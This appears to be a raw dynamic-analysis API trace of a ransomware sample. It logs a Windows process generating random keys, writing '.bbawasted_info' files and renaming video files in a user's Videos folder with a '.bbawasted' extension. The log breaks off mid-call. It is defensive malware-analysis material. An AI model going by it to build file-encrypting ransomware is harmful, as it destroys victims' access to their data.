1 [0076.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\Cd6zVLtrJcMgy.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\cd6zvltrjcmgy.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.784] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.787] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.788] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.788] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.788] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.789] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.789] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.800] SetEndOfFile (hFile=0x11c) returned 1 [0076.850] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.850] CloseHandle (hObject=0x11c) returned 1 [0076.857] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c48 | out: hHeap=0x580000) returned 1 [0076.858] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.859] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.859] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.859] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\fhFGQ5FEiXXR.avi") returned 78 [0076.859] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a6) returned 0x5d2c38 [0076.859] lstrcpyW (in: lpString1=0x5d2cd4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.859] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.859] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.860] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.860] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\fhFGQ5FEiXXR.avi.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\fhfgq5feixxr.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.860] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.861] SetEndOfFile (hFile=0x11c) returned 1 [0076.865] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.865] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.865] lstrcpyW (in: lpString1=0x5d2cd4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.865] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\fhFGQ5FEiXXR.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\fhfgq5feixxr.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\fhFGQ5FEiXXR.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\fhfgq5feixxr.avi.bbawasted")) returned 1 [0076.866] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\fhFGQ5FEiXXR.avi.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\fhfgq5feixxr.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.866] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.868] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.869] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.869] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.869] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.870] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.870] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.878] SetEndOfFile (hFile=0x11c) returned 1 [0076.880] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.880] CloseHandle (hObject=0x11c) returned 1 [0076.884] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c38 | out: hHeap=0x580000) returned 1 [0076.884] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.885] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.885] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\kNjyI4VJHW4Cc9 K1i.flv") returned 85 [0076.886] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b4) returned 0x5d2c38 [0076.886] lstrcpyW (in: lpString1=0x5d2ce2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.886] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.886] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.887] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.887] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.887] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\kNjyI4VJHW4Cc9 K1i.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\knjyi4vjhw4cc9 k1i.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.887] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.889] SetEndOfFile (hFile=0x11c) returned 1 [0076.889] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.889] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.889] lstrcpyW (in: lpString1=0x5d2ce2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.889] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\kNjyI4VJHW4Cc9 K1i.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\knjyi4vjhw4cc9 k1i.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\kNjyI4VJHW4Cc9 K1i.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\knjyi4vjhw4cc9 k1i.flv.bbawasted")) returned 1 [0076.890] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\kNjyI4VJHW4Cc9 K1i.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\knjyi4vjhw4cc9 k1i.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.890] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.894] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.899] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.899] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.899] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.900] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.900] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.911] SetEndOfFile (hFile=0x11c) returned 1 [0076.942] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0076.942] CloseHandle (hObject=0x11c) returned 1 [0076.943] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c38 | out: hHeap=0x580000) returned 1 [0076.943] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.944] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.944] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\NCZP Hhc.flv") returned 74 [0076.944] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29e) returned 0x5d2c38 [0076.944] lstrcpyW (in: lpString1=0x5d2ccc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.944] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.944] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5d2ee0) returned 1 [0076.945] CryptGenRandom (in: hProv=0x5d2ee0, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.945] CryptReleaseContext (hProv=0x5d2ee0, dwFlags=0x0) returned 1 [0076.945] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\NCZP Hhc.flv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\nczp hhc.flv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.945] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.946] SetEndOfFile (hFile=0x11c) returned 1 [0076.946] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.946] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.946] lstrcpyW (in: lpString1=0x5d2ccc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.946] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\NCZP Hhc.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\nczp hhc.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\NCZP Hhc.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\nczp hhc.flv.bbawasted")) returned 1 [0076.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\NCZP Hhc.flv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\nczp hhc.flv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.947] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.949] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d2ee0) returned 1 [0076.949] CryptGenRandom (in: hProv=0x5d2ee0, dwLen=0x1b8, pbBuffer=0x5ddb00 | out: pbBuffer=0x5ddb00) returned 1 [0076.949] CryptReleaseContext (hProv=0x5d2ee0, dwFlags=0x0) returned 1 [0076.949] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d2ee0) returned 1 [0076.950] CryptGenRandom (in: hProv=0x5d2ee0, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.950] CryptReleaseContext (hProv=0x5d2ee0, dwFlags=0x0) returned 1 [0076.959] SetEndOfFile (hFile=0x11c) returned 1 [0076.961] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.961] CloseHandle (hObject=0x11c) returned 1 [0076.962] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d2c38 | out: hHeap=0x580000) returned 1 [0076.962] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.963] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.963] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\OvM0cYSnOFaODF.swf") returned 80 [0076.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2aa) returned 0x5ddab8 [0076.963] lstrcpyW (in: lpString1=0x5ddb58, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.963] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0076.963] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.964] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0076.964] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\OvM0cYSnOFaODF.swf.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ovm0cysnofaodf.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.964] WriteFile (in: hFile=0x11c, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.965] SetEndOfFile (hFile=0x11c) returned 1 [0076.966] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.966] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.966] lstrcpyW (in: lpString1=0x5ddb58, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.966] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\OvM0cYSnOFaODF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ovm0cysnofaodf.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\OvM0cYSnOFaODF.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ovm0cysnofaodf.swf.bbawasted")) returned 1 [0076.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\OvM0cYSnOFaODF.swf.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\ovm0cysnofaodf.swf.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.966] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.967] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.968] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.968] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.968] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.969] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.969] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0077.024] SetEndOfFile (hFile=0x11c) returned 1 [0077.026] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.026] CloseHandle (hObject=0x11c) returned 1 [0077.027] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ddab8 | out: hHeap=0x580000) returned 1 [0077.027] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0077.028] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0077.028] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\smGQNVVV6.mkv") returned 75 [0077.028] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a0) returned 0x5ddab8 [0077.028] lstrcpyW (in: lpString1=0x5ddb4e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0077.028] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0077.028] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0077.029] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0077.029] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\smGQNVVV6.mkv.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\smgqnvvv6.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0077.030] WriteFile (in: hFile=0x11c, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0077.031] SetEndOfFile (hFile=0x11c) returned 1 [0077.031] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.031] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.031] lstrcpyW (in: lpString1=0x5ddb4e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0077.031] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\smGQNVVV6.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\smgqnvvv6.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\smGQNVVV6.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\smgqnvvv6.mkv.bbawasted")) returned 1 [0077.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\uJa-t0 nFe3Xb8_rsN8Q\\smGQNVVV6.mkv.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\uja-t0 nfe3xb8_rsn8q\\smgqnvvv6.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0077.032] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0077.033] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0077.034] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0077.034] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.034] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0077.037] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0077.037] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0077.045] SetEndOfFile (hFile=0x11c) returned 1 [0077.047] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0077.047] CloseHandle (hObject=0x11c) returned 1 [0077.048] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ddab8 | out: hHeap=0x580000) returned 1 [0077.048] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 